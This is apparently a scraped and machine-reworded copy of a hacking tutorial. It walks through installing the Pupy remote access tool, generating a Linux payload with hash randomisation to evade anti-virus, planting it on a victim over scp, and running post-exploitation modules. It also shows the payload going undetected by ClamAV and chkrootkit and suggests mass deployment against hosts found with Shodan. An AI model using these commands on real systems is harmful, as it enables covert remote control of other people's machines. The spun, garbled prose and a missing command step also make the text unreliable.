4 months ago

How to Use Pupy, a Linux Remote Access Tool « Null Byte :: WonderHowTo

In one of my previous articles, I discussed ShinoBot, a remote administration tool which makes itself obvious. The goal is usually to see if the user could detect a remote administration tool or RAT on their system. In This specific article, I’ll be demonstrating the use of Pupy, an actual RAT, on a target Ubuntu 16.04 server.

A RAT is usually a program which allows the remote control as well as administration of a computer, either for technical support or more nefarious goals. I’ve been a fan of RATs since I was first introduced to them. I spent more time than I’d like to admit playing with tools like Sub7 as well as Backorifice. They were powerful, easy to install, as well as rarely detected.

Pupy showing available arguments. Image via Null Byte

Pupy is usually a modern RAT, currently still in development, although miles ahead of early RATs. For starters, Pupy allows the generation of multiple types of payloads with different data exfiltration options, which can be stacked. Communication back to the C&C (command as well as control) server is usually very configurable, as well as Pupy also comes with an embedded Python interpreter. This specific allows Pupy’s modules to fetch Python packages via memory, as well as remotely access Python objects

Check out: Simulate a RAT on your network with ShinoBot

Pupy uses an all-in-memory execution guideline, which keeps its footprint very low while reducing the likelihood of being detected. Since which never touches the disk, which’s able to execute python modules in-memory on the target without being detected. which includes many modules which are geared towards post-exploitation as well as information gathering, meaning which even if which is usually executed as a low privilege user, which will connect back as well as give you plenty of options for privilege escalation.

Don’t Miss: How to build a telegram RAT

All in all, Pupy is usually an excellent addition to any attackers toolkit. Let’s set which up!

Step 1: Install Pupy

To get started out with Pupy, we need to clone which via git as well as take care of dependencies. To do so, type the following into a terminal window.

git clone https://github.com/n1nj4sec/pupy; cd pupy

Once we’ve got a copy of Pupy, we need to issue a couple more commands to get which set up.

git submodule init
git submodule update

Without getting too in depth on the topic, Git submodules allow you to use another project within an existing project. Git submodule init This specific pulls code via the submodule as well as places which into a pre-configured directory. Git submodule update updates the code within the submodule.

Next, we need to install the required Python modules. Do so by typing the following.

pip install -r pupy/requirements.txt

This specific command tells pip to read the requirements file as well as install the necessary modules.

Lastly, we need to gather the payload files. Type the following into terminal to do so.

wget https://github.com/n1nj4sec/pupy/releases/download/latest/payload_templates.txz

tar xvf payload_templates.txz && mv payload_templates/* pupy/payload_templates/ && rm payload_templates.txz && rm -r payload_templates

This specific command extracts the payload templates, moves all of them into the payload_templates directory as well as does some cleanup.

Once This specific is usually complete, we’re ready to start working with our RAT.

Step 2: Create a RAT for Deployment

The first thing to look at is usually our payload possibilities. We need to change directory to the Pupy directory within the already existing Pupy directory which we cloned with git. Then we can list payloads.

cd /path/to/pupy/pupy
./pupygen.py -l | less -R

We’ve got a solid selection here. Pupy will happily create a payload with minimal options. If you execute pupygen with no arguments, which defaults to an x86 Windows reverse payload on port 443. For the sake of demonstration, I’m going to be building my payload for an Ubuntu 14.04.3 LTS Discharge machine.

Our first option is usually format, or -f. This specific is usually the type of payload we’ll be generating. We’ve got quite a few options here, which are explained by passing pupygen the -l argument. I will be using the py payload. This specific generates a fully packaged python payload. In order to use This specific payload, Python will need to be installed on the target machine.

The next arguments are operating system, as well as architecture. Using the -O argument, I can set my target operating system to Linux. There are also options for Android, Windows, as well as Solaris. Using the -A argument I set my architecture to x64.

Next, I configure scriptlets. There is usually a large selection of scriptlets to choose via, which modify how the Pupy client will function. One even allows you to include your own scripts! I will be using hide_argv to change the Pupy process name. In This specific case, I’m just going to call which myRemoteAccess.

Lastly, I will be using the –randomize-hash argument to randomize the hash of the package. This specific is usually an anti-virus evasion technique. Since I have ClamAV installed on my victim machine, we’ll be able to see how well This specific works.

currently which I’ve sorted out all the options which’s time to execute pupygen. You can see all the arguments we just discussed inside the command below. Enter This specific (or your chosen payload configuration) to proceed.

./pupygen.py -f py -O linux -A x64 -s hide_argv,name=myRemoteAccess –randomize-hash

You’ll notice inside the example which I didn’t specify a port or IP address. Pupy automatically includes them with its best guess if they are omitted.

currently which we have created our RAT payload, we need to set up the server.

Since I didn’t change the transport or port when I generated the client, I don’t need to pass any arguments to the server. Let’s set which up by typing the following.


Step 3: Deploy Your Pupy RAT

currently which we hold the server running, we can deploy the RAT. In This specific case, I’m going to place which on my victim machine via SCP as well as then execute which. SCP, or secure copy, will allow us to move a file via our host machine to a remote machine with the following command.

scp ~/location-of-pupy-file VictimUsername@VictimIP:~/location-you-want-to-move-file-to

This specific creates a scenario similar to a machine which has been exploited, then privilege escalated to root.

I get some errors during the execution of the RAT, although they didn’t seem to be a problem, as the client connects back to my server. I execute the command “?” as well as am presented with quite a few options.

For each one of these commands, you can find out more information by executing the command with the -h argument. For example, we can type the following command.

netstat -h

This specific shows the help for the netstat command. For users of Meterpreter, This specific tool should feel somewhat familiar, which’s organized in a similar manner.

The basic commands are a solid foundation, although the meat of This specific tool is usually contained inside the modules. These can be listed via within the server.


There are quite a few modules available for use, as well as the syntax is usually slightly different via Meterpreter. The first module I used was to check if the client was running inside a virtual machine. To do so, I enter the following command.

run check_vm

The module runs, as well as returns a result! Of course, there are many more modules covering most use cases. Pupy even includes a few troll modules, such as the ability to vibrate phones or tablets or use Android text to speech to talk to the victim.

Since I built my RAT using the “–randomize-hash” argument, I thought I would certainly see if ClamAV detects which. Running ClamScan recursively on the /home directory resulted in no positive hits for malware.

Since This specific passed successfully, I thought I’d give the chkrootkit module a try. This specific checks for any signs of a rootkit, like the one we’re currently running. Chkrootkit also failed to find any issues with the machine. Even though Pupy is usually running.

Out of curiosity, I created a Meterpreter payload in elf format as well as uploaded which to my victim machine. This specific was also not detected by clamscan, or chkrootkit. The take away here is usually which I’m either using the wrong tools, or anti-virus needs to improve. Though the state of the anti-virus industry is usually probably a topic better left to another discussion.

Pupy as a Hacking Tool

Even though Pupy works out of the box, which is usually still in development as well as may be a little rougher than you might be used to working with. Pupy a solid remote administration tool, that has a Great spread of features as well as modules for nearly any type of penetration test. which works on a variety of systems as well as is usually worthy of inclusion in hacker toolkits everywhere.

For advanced users, the way which payloads are generated as well as managed make This specific tool a contender for automated attacks. For example, you could use Shodan or something similar to search for specific vulnerable instances of a service. You would certainly be able to exploit the service, as well as have an idea of the underlying operating system, allowing you to generate one payload as well as efficiently distribute which payload to multiple vulnerable systems.

I will be pausing This specific virtual machine while keeping Pupy running. If anyone has any suggestions for a Linux anti-malware tool to detect This specific, I will throw which on the machine as well as test which. If you have any various other questions or comments, as always feel free to post inside the comments or on Twitter!

Cover photo/screenshots: @0xBarrow/Null Byte

Leave a Comment

Your email address will not be published. Required fields are marked *

four × 2 =